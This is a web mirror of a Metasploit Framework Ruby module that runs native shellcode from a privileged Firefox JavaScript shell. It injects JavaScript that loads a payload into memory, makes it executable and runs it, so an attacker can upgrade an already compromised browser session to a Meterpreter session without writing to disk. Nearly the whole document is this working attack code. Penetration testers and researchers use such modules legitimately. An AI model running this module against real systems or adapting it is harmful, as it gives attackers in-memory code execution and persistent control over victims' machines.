Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/firefox/local/exec_shellcode.rb
31240 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking # Missing autodetection, but has widespread targetability

8


9
  include Msf::Payload::Firefox

10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',

17
        'Description' => %q{

18
          This module allows execution of native payloads from a privileged Firefox Javascript shell.

19
          It places the specified payload into memory, adds the necessary protection flags,

20
          and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter

21
          session without touching the disk.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'joev' ],

25
        'DisclosureDate' => '2014-03-10',

26
        'Targets' => [

27
          [

28
            'Native Payload', {

29
              'Platform' => %w[linux osx win unix],

30
              'Arch' => ARCH_ALL

31
            }

32
          ]

33
        ],

34
        'Notes' => {

35
          'Reliability' => [ REPEATABLE_SESSION ],

36
          'Stability' => [ CRASH_SAFE ],

37
          'SideEffects' => [ IOC_IN_LOGS ]

38
        },

39
        'DefaultTarget' => 0

40
      )

41
    )

42


43
    register_options([

44
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

45
    ])

46
  end

47


48
  def exploit

49
    print_status('Running the JavaScript shell...')

50
    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")

51
    results = session.shell_read_until_token('[!JAVASCRIPT]', 0, datastore['TIMEOUT'])

52
    print_warning(results) if results.present?

53
  end

54


55
  def js_payload

56
    %|

57
      (function(send){

58
        try {

59
          #{run_payload}

60
          send("Payload executed.");

61
        } catch (e) {

62
          send(e);

63
        }

64
      })(send);

65
    |.strip

66
  end

67
end

68


69